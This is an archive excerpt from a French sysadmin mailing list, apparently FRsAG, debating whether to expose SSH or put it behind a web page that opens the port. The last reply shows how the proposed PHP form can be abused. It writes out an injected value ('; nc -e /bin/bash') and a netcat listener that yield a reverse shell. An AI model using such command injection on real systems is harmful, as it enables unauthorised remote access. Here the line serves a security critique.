[FRsAG] Re: Filtrage de message au runtime

2024-05-01 Par sujet Ludovic LEVET via FRsAG
Il ne faut jamais laisser le port ssh directement sur le net sans filtrage de la source  ... Mettre en place par exemple un "site" web d'ouverture du/des ports. Par exemple un vhost : https://remoteadm.mydomain.com/server1/ Mise en place : Créer un vhost sur le serveur (beaucoup mieux : créer

[FRsAG] Re: Filtrage de message au runtime

2024-05-01 Par sujet David Ponzone
C’est pas une critique mais ça veut dire que tu fais plus confiance à l’auth HTTPS qu’à l’auth SSH ? David > Le 1 mai 2024 à 20:34, Ludovic LEVET via FRsAG a écrit : > > Il ne faut jamais laisser le port ssh directement sur le net sans filtrage de > la source ... > > Mettre en place par exe

[FRsAG] Re: Filtrage de message au runtime

2024-05-01 Par sujet Ludovic LEVET via FRsAG
Heu ... Déjà : 1) Si tu as pas le vhost + url complete, ben t'arriveras déjà a rien ... 2) l'auth https + 2fa , oui pas de brute force dessus si configuré correctement (max retry 3, fail2ban ... )... 3) Bon ... (Mode Bigard On ..) En admettant que la chauves-souris elle trouve le code de la

[FRsAG] Re: Filtrage de message au runtime

2024-05-01 Par sujet Fabien Schwebel
On Mon, Apr 29, 2024, 11:52 Louis G. wrote: > Alors pas tout à fait. Changer le port te permettra juste de ne plus > remonter dans les résultats Shodan des services écoutant sur le port 22. Tu > apparaitra tout de même dans les résultats des recherches qui ciblent SSH > (voir plus précisément sur

[FRsAG] Re: [SPAM] Re: Filtrage de message au runtime

2024-05-01 Par sujet Julien Reitzel
Hello, au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec : ; nc -e /bin/bash du côté attaquant lancer : $ nc -lvp Et voilà un reverse shell simpliste qui contourne l'auth ssh. -- Julien. Le 01/05/2024 21:33, Ludovic LEVET via FRsAG a écrit : Heu ... Déjà